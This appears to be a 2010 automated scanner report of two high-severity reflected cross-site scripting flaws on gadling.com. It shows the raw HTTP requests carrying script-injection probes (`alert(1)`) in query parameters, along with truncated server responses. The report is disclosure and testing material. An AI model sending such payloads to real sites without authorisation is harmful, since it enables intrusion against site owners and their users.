1. Cross-site scripting (reflected)
1.1. http://gadling.com/ [name of an arbitrarily supplied request parameter]
1.2. http://gadling.com/ [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://gadling.com |
Path: | / |
GET /?99aa1"-alert(1)- Host: gadling.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 19 Nov 2010 23:15:21 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999991 Connection: Keep-Alive Content-Type: text/html X-Pad: avoid browser bug Content-Length: 107014 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Gadling | travel blo ...[SNIP]... s_265.channel="wb.gadling s_265.pageType=""; s_265.linkInternalFilters s_265.mmxgo = true; s_265.prop1="Gadling"; s_265.prop2="Home"; s_265.prop12="http://www s_265.prop16="Gadling | travel blog | news, stories, deals, and tips."; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="ntc"; s_265.prop22="13"; var s_code=s_265 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gadling.com |
Path: | / |
GET /?3936b"><script>alert(1)< Host: gadling.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 19 Nov 2010 23:15:19 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999992 Connection: Keep-Alive Content-Type: text/html X-Pad: avoid browser bug Content-Length: 107089 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Gadling | travel blo ...[SNIP]... <link rel="canonical" href="http://www.gadling ...[SNIP]... |